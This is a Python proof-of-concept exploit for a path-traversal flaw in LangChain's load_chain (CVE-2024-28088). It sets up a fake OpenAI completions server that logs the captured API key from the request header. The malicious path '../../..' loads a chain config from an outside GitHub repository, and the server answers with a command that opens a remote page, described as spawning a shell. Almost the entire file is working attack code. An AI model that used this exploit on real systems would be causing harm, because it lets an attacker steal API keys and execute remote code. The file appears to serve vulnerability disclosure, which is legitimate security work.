poc.py

import os
from langchain.chains import load_chain
from flask import Flask, request
import threading

app = Flask(__name__)


@app.route("/completions", methods=["POST"])
def get_completions():
    print("\t[+] Received interaction!")

    print("\t[++] Stole OpenAI api key:", request.headers.get("authorization"))

    # Sending a JSON response
    print("\t[++] Spawning shell...")
    return {
        "choices": [
            {
                "text": "open https://raw.githubusercontent.com/levpachmanov/cve-2024-28088-poc/main/pwnd.html"
            }
        ],
        "usage": "PINKDRACONIAN",
    }


def run_server():
    t = threading.Thread(target=app.run, kwargs={"host": "0.0.0.0", "port": "8000"})
    t.start()
    t.join()


thrd1 = threading.Thread(target=run_server, args=[])
thrd1.start()
os.environ["OPENAI_API_KEY"] = "SECRET_TOKEN"

malicious_path = "lc@ANYTHING://chains/../../../../../../../../../levpachmanov/cve-2024-28088-poc/main/poc_rce.json"
chain = load_chain(malicious_path)
print(chain.invoke("ANYTHING"))
thrd1.join()